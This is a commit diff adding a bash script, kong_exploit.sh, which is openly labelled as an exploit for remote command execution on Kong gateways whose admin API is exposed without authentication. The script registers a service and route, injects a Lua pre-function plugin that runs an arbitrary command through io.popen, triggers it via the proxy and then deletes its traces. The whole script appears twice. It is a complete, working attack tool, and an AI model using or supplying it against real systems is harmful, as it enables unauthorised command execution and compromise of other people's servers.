seadog007 · April 30, 2020 07:14
diff --git a/kong_exploit.sh b/kong_exploit.sh
 #!/bin/bash

 # Kong Public Exposed & Unauthorized API Exploit
 # Using the API to RCE (even the kong is highly possible in container)
 #
 # Author: Li-Heng Yu (Jasper Yu) <[email protected]>
 # Thu April 30, 2020
 # MIT License

 [ $# -ne 3 ] && echo 'Usage: '$0' <Kong API> <Kong Proxy Entry> <Command>' && echo 'Example: ./kong_exploit.sh "192.168.1.2:8001" "192.168.1.2:8000" "whoami"' && exit

 urlencode() {
 	# urlencode <string>
 	old_lc_collate=$LC_COLLATE
 	LC_COLLATE=C

 	local length="${#1}"
 	for (( i = 0; i < length; i++ )); do
 		local c="${1:i:1}"
 		case $c in
 			[a-zA-Z0-9.~_-]) printf "$c" ;;
 			*) printf '%%%02X' "'$c" ;;
 		esac
 	done

 	LC_COLLATE=$old_lc_collate
 }

 cleanup(){
 	# Delete the route
 	curl -X DELETE "$api_host"'/routes/aaabbbccc'

 	# Delte the service
 	curl -X DELETE "$api_host"'/services/aaabbbccc'
 }

 trap cleanup SIGINT SIGTERM

 api_host="$1"
 proxy_host="$2"
 cmd="$3"

 # Create a new service
 curl -X POST "$api_host"'/services' -F 'protocol=http' -F 'name=aaabbbccc' -F 'host=140.113.170.76' -F 'port=80' -F 'path=/' -o /dev/null -s
 sleep 0.2

 # Create a new route
 curl -X POST "$api_host"'/routes' -F 'name=aaabbbccc' -F 'protocols=http' -F 'paths=/aaabbbccc' -F 'service.name=aaabbbccc' -o /dev/null -s
 sleep 0.2

 # Add Pre-function Plugin for the service
 curl -X POST "$api_host"'/services/aaabbbccc/plugins' --data "name=pre-function&config.functions="$(urlencode 'local handle = io.popen("'"$cmd"'"); local result = handle:read("*a"); handle:close(); return kong.response.exit(200, result)') -o /dev/null -s
 sleep 1

 # Trigger the exploit
 curl --max-time 3 "$proxy_host"'/aaabbbccc'

 cleanup
	#!/bin/bash

	# Kong Public Exposed & Unauthorized API Exploit
	# Using the API to RCE (even the kong is highly possible in container)
	#
	# Author: Li-Heng Yu (Jasper Yu) <[email protected]>
	# Thu April 30, 2020
	# MIT License

	[ $# -ne 3 ] && echo 'Usage: '$0' <Kong API> <Kong Proxy Entry> <Command>' && echo 'Example: ./kong_exploit.sh "192.168.1.2:8001" "192.168.1.2:8000" "whoami"' && exit

	urlencode() {
	# urlencode <string>
	old_lc_collate=$LC_COLLATE
	LC_COLLATE=C

	local length="${#1}"
	for (( i = 0; i < length; i++ )); do
	local c="${1:i:1}"
	case $c in
	[a-zA-Z0-9.~_-]) printf "$c" ;;
	*) printf '%%%02X' "'$c" ;;
	esac
	done

	LC_COLLATE=$old_lc_collate
	}

	cleanup(){
	# Delete the route
	curl -X DELETE "$api_host"'/routes/aaabbbccc'

	# Delte the service
	curl -X DELETE "$api_host"'/services/aaabbbccc'
	}

	trap cleanup SIGINT SIGTERM

	api_host="$1"
	proxy_host="$2"
	cmd="$3"

	# Create a new service
	curl -X POST "$api_host"'/services' -F 'protocol=http' -F 'name=aaabbbccc' -F 'host=140.113.170.76' -F 'port=80' -F 'path=/' -o /dev/null -s
	sleep 0.2

	# Create a new route
	curl -X POST "$api_host"'/routes' -F 'name=aaabbbccc' -F 'protocols=http' -F 'paths=/aaabbbccc' -F 'service.name=aaabbbccc' -o /dev/null -s
	sleep 0.2

	# Add Pre-function Plugin for the service
	curl -X POST "$api_host"'/services/aaabbbccc/plugins' --data "name=pre-function&config.functions="$(urlencode 'local handle = io.popen("'"$cmd"'"); local result = handle:read("*a"); handle:close(); return kong.response.exit(200, result)') -o /dev/null -s
	sleep 1

	# Trigger the exploit
	curl --max-time 3 "$proxy_host"'/aaabbbccc'

	cleanup